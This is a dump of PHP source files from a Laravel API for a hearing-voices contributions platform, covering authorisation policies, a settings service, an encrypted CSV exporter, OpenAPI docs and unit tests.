"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\EndUser;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass EndUserPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list end users.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function list(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function view(User $user, EndUser $endUser): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $user->endUser->is($endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can create end users.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function create(?User $user): bool\n {\n return optional($user)->isAdmin() || !optional($user)->isEndUser();\n }\n\n /**\n * Determine whether the user can update the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function update(User $user, EndUser $endUser): bool\n {\n return $user->isEndUser() && $user->endUser->is($endUser);\n }\n\n /**\n * Determine whether the user can delete the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function delete(User $user, EndUser $endUser): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $user->endUser->is($endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can view the authenticated end user.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function me(User $user): bool\n {\n return $user->isEndUser();\n }\n}\n"
},
{
"alpha_fraction": 0.5454760193824768,
"alphanum_fraction": 0.5457122325897217,
"avg_line_length": 35.49137878417969,
"blob_id": "3de8dafefa505cfee4727098d1251ee13af48b5c",
"content_id": "6919e937a5e31f604e0cff8afcf963461963b402",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4233,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 116,
"path": "/app/Services/SettingService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Setting\\SettingsUpdated;\nuse App\\Models\\Setting;\nuse Illuminate\\Database\\Eloquent\\Collection;\nuse Illuminate\\Support\\Arr;\n\nclass SettingService\n{\n /**\n * @param array $data\n * @return \\Illuminate\\Database\\Eloquent\\Collection\n */\n public function update(array $data): Collection\n {\n /** @var \\App\\Models\\Setting $frontendContent */\n $frontendContent = Setting::findOrFail('frontend_content');\n\n /** @var \\App\\Models\\Setting $emailContent */\n $emailContent = Setting::findOrFail('email_content');\n\n // Update the frontend content settings.\n $frontendContent->value = [\n 'home_page' => [\n 'title' => $this->frontendContentValue($data, 'home_page.title'),\n ],\n ];\n $frontendContent->save();\n\n // Update the email content settings.\n $emailContent->value = [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $this->emailContentValue($data, 'admin.new_contribution.subject'),\n 'body' => $this->emailContentValue($data, 'admin.new_contribution.body'),\n ],\n 'updated_contribution' => [\n 'subject' => $this->emailContentValue($data, 'admin.updated_contribution.subject'),\n 'body' => $this->emailContentValue($data, 'admin.updated_contribution.body'),\n ],\n 'new_end_user' => [\n 'subject' => $this->emailContentValue($data, 'admin.new_end_user.subject'),\n 'body' => $this->emailContentValue($data, 'admin.new_end_user.body'),\n ],\n 'password_reset' => [\n 'subject' => $this->emailContentValue($data, 'admin.password_reset.subject'),\n 'body' => $this->emailContentValue($data, 'admin.password_reset.body'),\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $this->emailContentValue($data, 'end_user.email_confirmation.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.email_confirmation.body'),\n ],\n 'password_reset' => [\n 'subject' => $this->emailContentValue($data, 'end_user.password_reset.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.password_reset.body'),\n ],\n 'contribution_approved' => [\n 'subject' => $this->emailContentValue($data, 'end_user.contribution_approved.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.contribution_approved.body'),\n ],\n 'contribution_rejected' => [\n 'subject' => $this->emailContentValue($data, 'end_user.contribution_rejected.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.contribution_rejected.body'),\n ],\n ],\n ];\n $emailContent->save();\n\n $settings = Setting::all();\n\n event(new SettingsUpdated($settings));\n\n return $settings;\n }\n\n /**\n * Helper function for getting the value of content settings.\n *\n * @param array $data\n * @param string $settingKey\n * @param string $nestedKey\n * @return string\n */\n protected function contentValue(array $data, string $settingKey, string $nestedKey): string\n {\n $setting = Setting::findOrFail($settingKey);\n\n return Arr::get($data, \"{$settingKey}.{$nestedKey}\") ?? Arr::get($setting->value, $nestedKey);\n }\n\n /**\n * @param array $data\n * @param string $key\n * @return string\n */\n protected function frontendContentValue(array $data, string $key): string\n {\n return $this->contentValue($data, 'frontend_content', $key);\n }\n\n /**\n * @param array $data\n * @param string $key\n * @return string\n */\n protected function emailContentValue(array $data, string $key): string\n {\n return $this->contentValue($data, 'email_content', $key);\n }\n}\n"
},
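A hypothetical input sketch for `SettingService::update()` above. Any key omitted from `$data` keeps its stored value via the null coalescing in `contentValue()`:

```php
$settings = $settingService->update([
    'frontend_content' => [
        'home_page' => ['title' => 'Welcome'],
    ],
    'email_content' => [
        'admin' => [
            'new_contribution' => [
                'subject' => 'New contribution submitted',
                'body' => 'A new contribution is awaiting review.',
            ],
        ],
        // Omitted sections keep their current values.
    ],
]);
```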
{
"alpha_fraction": 0.5306748747825623,
"alphanum_fraction": 0.5314416885375977,
"avg_line_length": 30.80487823486328,
"blob_id": "3daf2f6d5f4df13c4fed15cee40eb6e05c61c5f7",
"content_id": "eeb5c7590411567cd84c21773062b718f9901915",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 41,
"path": "/app/Http/Filters/EndUser/EmailVerifiedFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\EndUser;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EmailVerifiedFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param bool|string $emailVerified\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $emailVerified, string $property): Builder\n {\n $emailVerified = $emailVerified === true ? 'true' : $emailVerified;\n $emailVerified = $emailVerified === false ? 'false' : $emailVerified;\n\n return $query->whereHas(\n 'user',\n function (Builder $query) use ($emailVerified): void {\n switch ($emailVerified) {\n case 'true':\n $query->whereNotNull('users.email_verified_at');\n break;\n case 'false':\n $query->whereNull('users.email_verified_at');\n break;\n case 'all':\n default:\n // Don't apply and extra conditions, instead load all.\n break;\n }\n }\n );\n }\n}\n"
},
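A hypothetical wiring sketch for the filter above, mirroring the `Filter::custom()` pattern already used in `AuditController`:

```php
$endUsers = QueryBuilder::for(EndUser::query())
    ->allowedFilters([
        Filter::custom('email_verified', EmailVerifiedFilter::class),
    ])
    ->paginate();

// e.g. GET /end-users?filter[email_verified]=true
```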
{
"alpha_fraction": 0.5646490454673767,
"alphanum_fraction": 0.5657857060432434,
"avg_line_length": 26.069231033325195,
"blob_id": "4668af13952c60c0b38ee66261e4bd5d2c1a6a33",
"content_id": "7c4a706ff5c85c279ad72ecc952483093b2f91c1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3519,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 130,
"path": "/app/Exporters/BaseExporter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exporters;\n\nuse App\\Models\\Admin;\nuse App\\Models\\Export;\nuse App\\Models\\File;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Storage;\nuse Illuminate\\Support\\Str;\nuse ZipArchive;\n\nabstract class BaseExporter\n{\n /**\n * @return string\n */\n abstract protected function filename(): string;\n\n /**\n * @return array\n */\n abstract protected function data(): array;\n\n /**\n * @return string\n */\n public static function type(): string\n {\n $type = class_basename(static::class);\n $type = str_replace('Exporter', '', $type);\n $type = Str::snake($type);\n\n return $type;\n }\n\n /**\n * Run the export and return the generated export.\n *\n * @param \\App\\Models\\Admin $admin\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return \\App\\Models\\Export\n */\n public function exportFor(Admin $admin): Export\n {\n /** @var \\App\\Models\\File $file */\n $file = File::create([\n 'filename' => $this->filename(),\n 'mime_type' => 'application/zip',\n 'is_private' => true,\n ]);\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user_id,\n 'created_at' => Date::now(),\n ]);\n\n $contents = $this->createCsv();\n $decryptionKey = Str::random();\n\n $file->upload(\n $this->createZip($contents, $decryptionKey)\n );\n\n return new Export($fileToken, $decryptionKey);\n }\n\n /**\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string\n */\n protected function createCsv(): string\n {\n return $this->tempFileContents(\n function (string $filepath): void {\n $csv = fopen($filepath, 'w');\n\n foreach ($this->data() as $row) {\n fputcsv($csv, $row);\n }\n\n fclose($csv);\n }\n );\n }\n\n /**\n * @param string $contents\n * @param string $decryptionKey\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string The zip contents\n */\n protected function createZip(string $contents, string $decryptionKey): string\n {\n return $this->tempFileContents(\n function (string $filepath) use ($contents, $decryptionKey): void {\n $zip = new ZipArchive();\n $zip->open($filepath, ZipArchive::CREATE);\n $zip->addFromString('export.csv', $contents);\n $zip->setEncryptionName('export.csv', ZipArchive::EM_AES_256, $decryptionKey);\n $zip->close();\n }\n );\n }\n\n /**\n * Allows the callback to create a temporary file and extract its content.\n * The temporary file is then immediately deleted.\n *\n * @param callable $callback\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string\n */\n protected function tempFileContents(callable $callback): string\n {\n $filename = Str::uuid()->toString() . '.tmp';\n $filepath = Config::get('filesystems.disks.temp.root') . '/' . $filename;\n\n $callback($filepath);\n\n $contents = Storage::disk('temp')->get($filename);\n Storage::disk('temp')->delete($filename);\n\n return $contents;\n }\n}\n"
},
{
"alpha_fraction": 0.6683587431907654,
"alphanum_fraction": 0.6700507402420044,
"avg_line_length": 20.10714340209961,
"blob_id": "01aa972aff272833b38d4754922ad2da8f86b831",
"content_id": "563bd62e60fa5bd895eca3995cc787f8115356e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Audit.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Audit extends Model\n{\n use Mutators\\AuditMutators;\n use Relationships\\AuditRelationships;\n use Scopes\\AuditScopes;\n\n const ACTION_LOGIN = 'login';\n const ACTION_LOGOUT = 'logout';\n const ACTION_CREATE = 'create';\n const ACTION_READ = 'read';\n const ACTION_UPDATE = 'update';\n const ACTION_DELETE = 'delete';\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n}\n"
},
{
"alpha_fraction": 0.7020262479782104,
"alphanum_fraction": 0.7032181024551392,
"avg_line_length": 28.964284896850586,
"blob_id": "df56be65a853f2cc8ff4f600937e54d4ddafcc5c",
"content_id": "1a581f20dfe9c5d49955ed51c053f142b584fc0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/EndUsers/EndUsersRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\EndUsers;\n\nuse App\\Docs\\Operations\\EndUser\\IndexEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\StoreEndUserOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass EndUsersRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/end-users')\n ->operations(\n IndexEndUserOperation::create(),\n StoreEndUserOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5715871453285217,
"alphanum_fraction": 0.5726969838142395,
"avg_line_length": 18.586956024169922,
"blob_id": "71d8f67fbbd44f21997a05acec9eb7ae618e9ade",
"content_id": "799086e019999fec6c35a604f679715d048ad36a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 901,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 46,
"path": "/app/Policies/FilePolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\File;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass FilePolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can request the export.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\File $file\n * @return bool\n */\n public function request(User $user, File $file): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can download the file.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\File $file\n * @return bool\n */\n public function download(?User $user, File $file): bool\n {\n if ($file->isPublic()) {\n return true;\n }\n\n if (optional($user)->isAdmin()) {\n return true;\n }\n\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.5910845994949341,
"alphanum_fraction": 0.5914356112480164,
"avg_line_length": 23.560344696044922,
"blob_id": "a74695691741d47138a47459fec99765adc28c8e",
"content_id": "9a137dc882a55313db5094fb82b2c54f8ec58dca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2849,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 116,
"path": "/app/Policies/ContributionPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass ContributionPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list contributions.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can view the contribution.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function view(?User $user, Contribution $contribution): bool\n {\n if (optional($user)->isAdmin()) {\n return true;\n }\n\n if ($contribution->isPublic()) {\n return true;\n }\n\n if (optional($user)->isEndUser() && $contribution->belongsToEndUser($user->endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can create contributions.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function create(User $user): bool\n {\n return $user->isEndUser();\n }\n\n /**\n * Determine whether the user can update the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function update(User $user, Contribution $contribution): bool\n {\n return $user->isEndUser() && $contribution->belongsToEndUser($user->endUser);\n }\n\n /**\n * Determine whether the user can delete the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function delete(User $user, Contribution $contribution): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $contribution->belongsToEndUser($user->endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can approve the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function approve(User $user, Contribution $contribution): bool\n {\n return $user->isAdmin() && $contribution->isInReview();\n }\n\n /**\n * Determine whether the user can reject the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function reject(User $user, Contribution $contribution): bool\n {\n return $user->isAdmin() && ($contribution->isPublic() || $contribution->isInReview());\n }\n}\n"
},
{
"alpha_fraction": 0.541412889957428,
"alphanum_fraction": 0.5417174100875854,
"avg_line_length": 26.14049530029297,
"blob_id": "463fd06bd70cea760819cda3d2aba3dfdb9d371c",
"content_id": "3c0e2e87def78053b0a4a197e49a4bf19e04b04f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3284,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 121,
"path": "/tests/Unit/Rules/ValidFileTokenTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Rules\\ValidFileToken;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Str;\nuse Tests\\TestCase;\n\nclass ValidFileTokenTest extends TestCase\n{\n /** @test */\n public function it_passes_a_public_file(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('public')->create();\n\n $rule = new ValidFileToken($file, null);\n\n $result = $rule->passes('test', 'random_token');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_passes_a_valid_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_an_invalid_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', Str::uuid()->toString());\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function it_fails_a_valid_token_but_no_admin(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, null);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function it_fails_a_valid_token_but_different_admin(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => factory(Admin::class)->create()->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new ValidFileToken(\n factory(File::class)->create(),\n null\n );\n\n $this->assertEquals('The :attribute must be valid.', $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.5901525616645813,
"alphanum_fraction": 0.590846061706543,
"avg_line_length": 22.639345169067383,
"blob_id": "3690ba35c1ccef184ef1443c6359ecba02d3d27a",
"content_id": "061a23ed016801678bac28c4e25502c8321066d1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1442,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 61,
"path": "/app/Mail/TemplateMail.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Mail;\n\nuse App\\VariableSubstitution\\VariableSubstituter;\nuse Illuminate\\Contracts\\Mail\\Mailer;\nuse Illuminate\\Mail\\Message;\n\nclass TemplateMail extends GenericMail\n{\n /**\n * @var \\App\\VariableSubstitution\\VariableSubstituter\n */\n protected $substituter;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $subject\n * @param string $body\n * @param \\App\\VariableSubstitution\\VariableSubstituter $substituter\n */\n public function __construct(\n string $to,\n string $subject,\n string $body,\n VariableSubstituter $substituter\n ) {\n parent::__construct($to, $subject, $body);\n\n $this->substituter = $substituter;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\Illuminate\\Contracts\\Mail\\Mailer $mailer\n */\n public function handle(Mailer $mailer): void\n {\n $mailer->raw(\n $this->substituter->substitute($this->body),\n function (Message $message): void {\n $message\n ->to($this->to)\n ->subject($this->substituter->substitute($this->subject));\n }\n );\n }\n\n /**\n * @return \\App\\VariableSubstitution\\VariableSubstituter\n */\n public function getSubstituter(): VariableSubstituter\n {\n return $this->substituter;\n }\n}\n"
},
{
"alpha_fraction": 0.6180297136306763,
"alphanum_fraction": 0.6189591288566589,
"avg_line_length": 23.454545974731445,
"blob_id": "b2ac32f8ffe6c91b2c21a206bf8852b879833259",
"content_id": "b6bd76dfe9e294575ede6dd7a75a7c9f3d9dff20",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1076,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 44,
"path": "/app/Providers/AppServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse App\\Sms\\LogSmsSender;\nuse App\\Sms\\NullSmsSender;\nuse App\\Sms\\SmsSender;\nuse Carbon\\CarbonImmutable;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\ServiceProvider;\n\nclass AppServiceProvider extends ServiceProvider\n{\n /**\n * Register any application services.\n */\n public function register(): void\n {\n // Use CarbonImmutable as the date instance.\n Date::use(CarbonImmutable::class);\n\n // Bind the SMS sender concrete implementation to the interface through configuration.\n switch (Config::get('sms.driver')) {\n case 'log':\n $this->app->singleton(SmsSender::class, LogSmsSender::class);\n break;\n case 'null':\n default:\n $this->app->singleton(SmsSender::class, NullSmsSender::class);\n break;\n }\n }\n\n /**\n * Bootstrap any application services.\n */\n public function boot(): void\n {\n //\n }\n}\n"
},
{
"alpha_fraction": 0.5679486989974976,
"alphanum_fraction": 0.5794872045516968,
"avg_line_length": 24.161291122436523,
"blob_id": "5fe532561f48c6ca111bd5d770bc6864345d3891",
"content_id": "1754744acef174292647321cdd976f1c64e2d1fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 780,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 31,
"path": "/app/Http/Resources/AdminResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Admin $resource\n */\nclass AdminResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'name' => $this->resource->name,\n 'phone' => $this->resource->phone,\n 'email' => $this->resource->user->email,\n 'created_at' => $this->resource->user->created_at->toIso8601String(),\n 'updated_at' => $this->resource->user->updated_at->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6368613243103027,
"alphanum_fraction": 0.6374695897102356,
"avg_line_length": 32.551021575927734,
"blob_id": "e7e241cab3a762b887b880a8d89ab086756a6570",
"content_id": "49a2e10620f5e70edecb7470e2012a86efb30a9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1644,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 49,
"path": "/app/Docs/Operations/EndUser/StoreEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Schemas\\EndUser\\EndUserSchema;\nuse App\\Docs\\Schemas\\EndUser\\StoreEndUserSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass StoreEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Create an end user')\n ->description(\n Utils::operationDescription(['Public', Admin::class])\n )\n ->tags(EndUsersTag::create())\n ->noSecurity()\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(StoreEndUserSchema::create())\n )\n )\n ->responses(\n Response::created()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, EndUserSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6289855241775513,
"alphanum_fraction": 0.6294686198234558,
"avg_line_length": 27.75,
"blob_id": "ad1953aa4fa786743b84efcbda8f51b170352ce8",
"content_id": "4d0edb8fe781f572fc4dc3ae253fc7f469ad7f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2070,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 72,
"path": "/tests/Unit/Support/FilesystemTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Exceptions\\RiskyPathException;\nuse App\\Support\\Filesystem;\nuse Tests\\TestCase;\n\nclass FilesystemTest extends TestCase\n{\n /** @test */\n public function it_throws_an_exception_when_trying_to_clear_a_dir_not_in_the_storage_path(): void\n {\n $this->expectException(RiskyPathException::class);\n\n $filesystem = new Filesystem();\n\n $filesystem->clearDir('/tmp');\n }\n\n /** @test */\n public function it_does_nothing_if_the_directory_doesnt_exist(): void\n {\n $filsystem = new Filesystem();\n\n $result = $filsystem->clearDir(storage_path('testing/non_existent_directory'));\n\n $this->assertNull($result);\n }\n\n /** @test */\n public function it_clears_a_multi_level_directory(): void\n {\n mkdir(storage_path('testing/test_directory'));\n mkdir(storage_path('testing/test_directory/nested_directory'));\n file_put_contents(storage_path('testing/test_directory/test.txt'), 'Lorem ipsum');\n file_put_contents(storage_path('testing/test_directory/nested_directory/test.txt'), 'Lorem ipsum');\n\n $filesystem = new Filesystem();\n\n $filesystem->clearDir(storage_path('testing/test_directory'));\n\n $this->assertFalse(\n file_exists(storage_path('testing/test_directory/test.txt'))\n );\n $this->assertFalse(\n file_exists(storage_path('testing/test_directory/nested_directory/test.txt'))\n );\n }\n\n /**\n * Clean up the testing environment before the next test.\n *\n * @return void\n */\n protected function tearDown(): void\n {\n (new Filesystem())->clearDir(storage_path('testing/test_directory'));\n\n if (is_dir(storage_path('testing/test_directory/nested_directory'))) {\n rmdir(storage_path('testing/test_directory/nested_directory'));\n }\n\n if (is_dir(storage_path('testing/test_directory'))) {\n rmdir(storage_path('testing/test_directory'));\n }\n\n parent::tearDown();\n }\n}\n"
},
{
"alpha_fraction": 0.5660699009895325,
"alphanum_fraction": 0.5669224262237549,
"avg_line_length": 18.229507446289062,
"blob_id": "bab6d3e2cb8ff170aee59b6608cd109afc8b4cf7",
"content_id": "ed00c49d0ef9d43c8f234acce8018dd4fc67f159",
